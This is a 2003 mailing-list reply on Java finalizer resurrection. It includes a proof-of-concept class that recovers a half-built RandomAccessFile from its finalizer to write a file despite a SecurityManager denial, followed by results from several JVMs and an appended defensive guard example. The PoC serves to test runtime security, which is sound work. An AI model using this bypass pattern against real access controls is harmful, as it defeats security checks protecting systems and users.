RE: Small ZipFile patch

From: Mark Wielaard
Subject: RE: Small ZipFile patch
Date: 04 Mar 2003 23:56:26 +0100


On Tue, 2003-03-04 at 23:16, Jeroen Frijters wrote:
> Yep. You can do some very tricky things with this. For every non-final
> class with a non-final finalize it is possible to obtain an initialized
> reference to an instance of that class *without* running a constructor
> by taking advantage of the fact that the finalizer runs even if the
> constructor was never invoked.

Ugh. That is terrible for trying to keep some sane security framework.
I tried the attached class which overrides RandomAccessFile. It first
installs a SecurityManager to prevent the class from actually writing to
some file, but then tries anyway by using the back-from-dead object
returned by the finalizer. The results are interesting:

kaffe 1.0.7 doesn't throw any exceptions but also doesn't write to the

Kissme CVS+Classpath CVS correctly throws SecurityException then dumps

gij from CVS gives the interesting:

Exception in thread "main" java.lang.ExceptionInInitializerError
*** Got java.lang.NoClassDefFoundError: gnu.gcj.runtime.NameFinder while
to print stack trace.

Blackdown-1.4.1-beta correctly gives AccessControlException and then:

Unexpected Signal : 11 occurred at PC=0x403A264C


Good night,


import java.io.IOException;
import java.io.RandomAccessFile;

public class IRAF extends RandomAccessFile
{
    static RandomAccessFile raf;

    IRAF(String file) throws IOException
    {
      super(file, "rw");
    }

    // Runs even when the constructor failed; stores the object for later use.
    protected void finalize()
    {
      raf = this;
    }

    public static void main(String args[])
    {
      System.setSecurityManager(new SecurityManager());
      try { new IRAF(args[0]); } catch (Throwable t) { t.printStackTrace(); }

      while (raf == null)
        new Object(); // Generate some garbage till the finalizer triggers.

      try { raf.write(0xff); } catch (Throwable t) { t.printStackTrace(); }
    }
}
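
Added example, not part of the original message: one common defence against the resurrection trick shown above is an "initialized" flag that every method checks, so an instance whose constructor threw is unusable even if a subclass finalizer hands it back. The names `Guarded`, `Zombie` and the token check are hypothetical stand-ins for a real permission check, and the demo assumes a JVM on which finalization is still enabled.

```java
// Added illustration; all class names and the token check are constructed.
public class FinalizerGuardDemo {
    // Hardened class: the constructor can fail, so each method checks a flag
    // that is only set after the security check has passed.
    static class Guarded {
        private volatile boolean initialized = false;

        Guarded(String token) {
            // Constructed stand-in for a SecurityManager permission check.
            if (!"let-me-in".equals(token))
                throw new SecurityException("access denied");
            initialized = true;
        }

        void write(int b) {
            if (!initialized)
                throw new IllegalStateException("object was never constructed");
            System.out.println("wrote " + b);
        }
    }

    // Same pattern as IRAF in the message: the finalizer stores 'this'.
    static class Zombie extends Guarded {
        static volatile Guarded back;
        Zombie(String token) { super(token); }
        @Override protected void finalize() { back = this; }
    }

    public static void main(String[] args) throws Exception {
        try { new Zombie("wrong"); } catch (SecurityException e) { System.out.println(e); }

        // Ask for collection a bounded number of times instead of spinning forever.
        for (int i = 0; i < 100 && Zombie.back == null; i++) {
            System.gc();
            System.runFinalization();
            Thread.sleep(10);
        }
        if (Zombie.back == null) { System.out.println("finalizer did not run"); return; }

        // The resurrected instance exists, but the guard refuses to act on it.
        try { Zombie.back.write(0xff); } catch (IllegalStateException e) { System.out.println(e); }
    }
}
```

Declaring the class `final`, or giving it a `final` empty `finalize()`, removes the subclass hook entirely where the API allows it.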
